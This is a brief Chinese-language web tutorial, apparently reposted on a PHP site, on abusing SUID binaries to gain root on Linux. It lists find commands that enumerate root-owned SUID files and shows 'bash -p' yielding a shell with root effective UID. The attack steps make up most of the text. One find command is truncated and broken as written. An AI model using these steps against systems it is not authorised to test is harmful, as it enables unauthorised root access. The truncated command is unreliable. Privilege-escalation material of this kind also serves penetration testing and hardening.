首頁 > 運維 > linux運維 > Linux下如何利用SUID提權

Linux下如何利用SUID提權

WBOY
發布: 2023-05-23 23:52:05
轉載
1829 人瀏覽過

SUID是Linux的一種權限機制,具有這種權限的檔案會在執行時,使呼叫者暫時取得該檔案擁有者的權限。如果擁有SUID權限,那麼就可以利用系統中的二進位檔案和工具來進行root提權。

以下命令可以發現系統上執行的所有SUID可執行檔。具體來說,指令將嘗試尋找具有root權限的SUID的檔案。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls
登入後複製

Linux下如何利用SUID提權

 

Linux下如何利用SUID提權

# 以上所有二進位檔案都會以root使用者權限執行,因為它們的權限中包含"s",且對應的是root權限。

Bash

以下指令將以root權限開啟一個bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
登入後複製

Linux下如何利用SUID提權

#

以上是Linux下如何利用SUID提權的詳細內容。更多資訊請關注PHP中文網其他相關文章!

相關標籤:
來源:yisu.com
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板